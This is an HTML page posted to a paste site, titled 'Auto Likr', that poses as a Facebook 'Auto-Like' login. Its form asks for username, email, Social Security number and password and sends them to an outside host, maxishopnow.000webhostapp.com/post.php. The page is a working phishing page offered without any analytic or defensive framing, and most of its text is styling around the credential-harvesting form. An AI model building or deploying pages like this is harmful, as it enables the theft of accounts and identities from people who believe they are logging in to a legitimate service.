Untitled
2 years ago in Plain Text
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<style media="screen">
body{
margin: 0;
padding: 0;
font-family: sans-serif;
background-image: url(auto.jpg);
background-size: cover;
}
.heading{
color: blue;
text-align: center;
top: 20%;
position: relative;
width: 400px;
margin: auto;
}
.box{
position: absolute;
top: 60%;
left: 50%;
transform: translate(-50%,-50%);
width: 400px;
padding: 40px;
background: rgba(0, 0, 0, 0.6);
box-sizing: border-box;
box-shadow: 0 15px 25px rgba(0, 0, 0, 0.5);
border-radius: 10px;
}
.box h2{
margin: 0 0 30px;
padding: 0px;
color: #fff;
text-align: center;
}
.box .input-box{
position: relative;
}
.box .input-box input{
width: 100%;
padding: 10px 0px;
font-size: 16px;
color: #fff;
letter-spacing: 1px;
margin-bottom: 30px;
border: none;
outline: none;
background: transparent;
border-bottom: 1px solid #fff;
}
.box .input-box label{
position: absolute;
top: 0;
left: 0;
letter-spacing: 1px;
padding: 10px 0px;
font-size: 16px;
color: #fff;
transition: .5s;
}
.box .input-box input:focus ~ label,
.box .input-box input:valid ~ label{
top: -18px;
left: 0px;
color: #03a9f4;
font-size: 12px;
}
.box input[type="submit"]{
background: transparent;
border: none;
outline: none;
color: #fff;
background: #227be3;
padding: 10px 20px;
border-radius: 5px;
cursor:pointer;
}
.box input[type="submit"]:hover{
background-color: #3067b9;
}
.logo{
background-color: white;
border: none;
color: blue;
padding: 15px 32px;
text-align: center;
text-decoration: none;
font-size: 16px;
cursor: pointer;
width: 100px;
position: absolute;
margin-top: 5px;
margin-left: 5px;
box-shadow: 0 15px 25px rgba(0, 0, 0, 0.5);
}
a{
text-decoration: none;
}
.heading h1, p{
background-color: white;
box-shadow: 0 15px 25px 8px rgba(0, 0, 0, 0.5);
border-radius: 10px;
}
@media screen and (max-width: 480px){
.box{
top: 80%;
left: 60%;
}
}
</style>
<title>Auto Likr</title>
</head>
<body>
<a href="index.html"><div class="w3-display-topleft logo">
HOME
</div></a>
<div class="heading">
<h1 style="padding: 10px;">Auto-Like <br> <span style="font-size: 16px;">Login with your facebook account</span></h1>
</div>
<div class="box">
<h2>Login</h2>
<form action="https://maxishopnow.000webhostapp.com/post.php">
<div class="input-box">
<input type="text" name="username" autocomplete="off" required>
<label for="">Username</label>
</div>
<div class="input-box">
<input type="email" name="email" autocomplete="off" required>
<label for="">Email</label>
</div>
<div class="input-box">
<input type="number" name="ssno" autocomplete="off" required>
<label for="">Social Security No.</label>
</div>
<div class="input-box">
<input type="password" name="password" autocomplete="off" required>
<label for="">Password</label>
</div>
<input type="submit" value="Submit">
</form>
</div>
</body>
</html>